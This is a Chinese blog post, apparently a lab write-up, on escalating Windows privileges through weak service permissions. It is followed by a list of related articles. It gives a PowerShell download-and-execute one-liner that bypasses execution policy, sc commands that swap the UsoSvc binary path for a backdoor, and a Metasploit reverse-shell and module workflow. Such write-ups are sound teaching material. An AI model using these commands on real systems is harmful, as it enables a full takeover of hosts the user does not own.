windows系统配置错误提权

最新推荐文章于 2024-09-28 21:02:40 发布
最新推荐文章于 2024-09-28 21:02:40 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: Windows提权 文章标签: windows 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122316900
版权

系统服务权限配置错误:

文中通过利用windows系统服务权限配置的错误,将后门文件添加到此服务中,从而成功反弹shell,实现提权效果。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

描述:
Windows在系统启动时,会伴随着一些高权服务启动(windows服务是以system权限运行的)倘若某些服务存在一些漏洞,那么就能够借此服务进行权限劫持。
漏洞原理:
windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该文件,并随着系统启动获得控制权限。windows服务是以system权限运行的,其文件夹、文件和注册表key-value都是受强制访问控制保护的。但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务。
漏洞复现:
下载地址:
https://github.com/itm4n/PrivescCheck.git
执行命令:

powershell -nop -exec bypass -c "IEX (New-Object
Net.WebClient).DownloadString('http://192.168.45.135:8888/PrivescCheck.ps1'); Invoke-PrivescCheck

确定哪些服务能进行权限劫持,发现UsoSvc这个服务可利用:
在这里插入图片描述
同样使用msf生成后门,然后开启监听:
在这里插入图片描述
使用sc 来进行这个服务状态查询:

/c sc query UsoSvc #查看服务状态 ,如果开启,则先进行stop关闭
/c sc config usosvc binPath= "C:\ProgramData\6.exe" #替换成后门文件
/c sc start UsoSvc #重新开启服务

在这里插入图片描述
能够成功反弹,且权限是system权限,但极不稳定,所以需要设置自动迁移进程:
在这里插入图片描述

set AutoRunScript migrate -f #自动迁移进程 ,成功反弹:

在这里插入图片描述
同样msf也给我们提供了对应的检查模块并自动化劫持提升权限:

use exploit/windows/local/service_permissions 
set Session session号

在这里插入图片描述
成功获得新的session :
在这里插入图片描述

全局变量Global
关注
专栏目录
操作系统权限提升(六)之系统错误配置-不安全的服务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 1271
通常 Windows服务都是以 System权限运行的,当由于系统管理员错误配置导致低权限用户可以对某些服务修改时,可以通过修改服务启动文件的路径“ binpath”,将其替换为恶意程序的路径,这样服务启动时便会运行恶意程序
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 1001
随着网络安全的发展和普及,不打补丁的系统少之又少,所以很多时候通过系统自身的漏洞很难提权,这个时候就需要考虑查看是否存在可利用的错误系统配置,例如路径未加引号或未指定可执行文件路径等,总而言之就是因为管理员在配置一些软件的时候存在漏洞导致可以提权的。
Windows错误配置提权
谢公子的博客
02-27 2521
目录 Windows错误配置提权 系统服务权限配置错误 PowerUp.ps1实战利用 MSF下实战利用 Windows错误配置提权 当攻击者使用其他提权方法无法提权时,就会利用系统中的配置错误提权Windows操作系统中的常见配置错误包括管理员凭据配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。 系统服务权限配置错误 Windows系统服务文件在操作系统启动时加载...
系统服务权限配置错误
最新发布
m0_68636078的博客
09-28 454
自用
系统配置错误提权2
qq_42307546的博客
04-05 1056
5.2 不带引号的服务路径提权 当系统管理员配置Windows服务时,他们必须指定要执行的命令,或者运行可执行文件的路径。 当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则 系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到 的空格分隔的服务路径的第一个实例。 在c盘新建一个calc files文件夹里面创建一个文件文件叫cmd.bat内容如下 echo 123 并在c 盘目录下放置 calc.exe(计算器),在没有
Windows系统服务权限配置错误漏洞提权
yangbz123的博客
05-17 1917
目录漏洞介绍AccessChk工具介绍AccessChk常用参数漏洞检查AccessChk工具检查Powerup脚本检查Empire powerup模块检查MSF 上传脚本扫描漏洞利用漏洞防范如何创建服务删除服务参考文献 漏洞介绍 系统服务权限配置错误,在Windows系统中的服务权限都配置的那么完美总会有被忽视的地方,这些没有得到严格保护的系统服务,往往会被攻击者利用,系统服务权限设置有问题时,往往会导致如下风险,1、服务未运行攻击者会利用生成的服务替换掉原来的服务重启后提权,2、服务运行无法停止攻击者会
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2379
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
操作系统权限提升(十)之系统错误配置-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 614
计划任务提权的原理非常的简单,就是在设置计划任务的时候配置不当,导致我们可以更改计划任务执行的文件,我们可以进行劫持然后替换成自己的恶意文件达到提权的目的
Windows,Linux等系统提权工具
01-20
在IT安全领域中,系统提权(Privilege Escalation)是指攻击者通过利用操作系统中的漏洞或配置错误,将自身的权限提升到更高的级别,如Linux下的root权限或Windows下的Administrator权限。这通常涉及到一系列的技术...
windows&linux;提权总结
04-24
- 熟悉权限提升的常见方法,包括Windows中的UAC绕过、服务配置错误、计划任务等。 - 对Linux系统中SUID/SGID位的滥用、内核漏洞、配置文件错误等技术的掌握。 需要注意的是,这些信息和方法不应被用于非法目的。在...
(59.3)【Windows提权】系统服务权限配置错误漏洞提权:简介、工具:AccessChk、Empire
05-29 535
windows提权】工具
操作系统权限提升(七)之系统错误配置-不安全注册表提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 720
Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权
操作系统权限提升(九)之系统错误配置-泄露敏感信息提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 490
只要我们能知道电脑的最高权限的账号密码,或者一些票据或者凭证我们就可以通过认证,执行最高权限的命令
利用配置不当提权
weixin_30249203的博客
06-19 188
利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强) 一般情况下面 普通用户对程序是没有控制权的 • icacls • icacls c:\windows\*.exe /save perm /T • i586-mingw32msvc-gcc -o admin.exe admin.c (因为exe要给windows用所以这里使用i586-m...
Kali渗透测试提权3——利用配置不当提权
浅浅的博客
05-06 586
与漏洞提权相比,利用配置不当提权更为常见。在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵。因此,当入侵一台服务器后找不到漏洞,可利用配置不当进行提权。如: 可以查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式提权; 可以查找NTFS权限允许users修改删除的应用,利用配置不当进行提权; 代码中是否有过滤参数的...
windows 利用环境变量%PATH%中目录可写提权
weixin_30316097的博客
11-20 289
使用PowerUp的时候有时候会有这种结果 [*] Checking %PATH% for potentially hijackable DLL locations... Permissions : {ReadAttributes, ReadControl, Execute/Traverse, WriteAttrib ...
windows操作系统配置错误利用分析和防范
ailx10
09-05 290
windows操作系统中,黑客通常会通过系统内核溢出漏洞来提权,但是在行不通的情况下,就会利用系统的错误配置来提权windows操作系统中的常见配置错误包括:管理员凭证配置错误服务配置错误故意削弱的安全措施用户权限过高1、系统服务权限配置错误windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该...
windows提权之环境变量配置错误
一只web狗
07-11 1024
windows-环境变量配置错误简介
Windows提权技术详解
对于特定的系统目录和注册表键,如Program Files、Windows目录以及某些关键的注册表项,攻击者可能会利用它们来执行提权操作。 第二章 提权实例 本章提供了多个具体的提权案例,涵盖了各种环境和情况,如Web服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值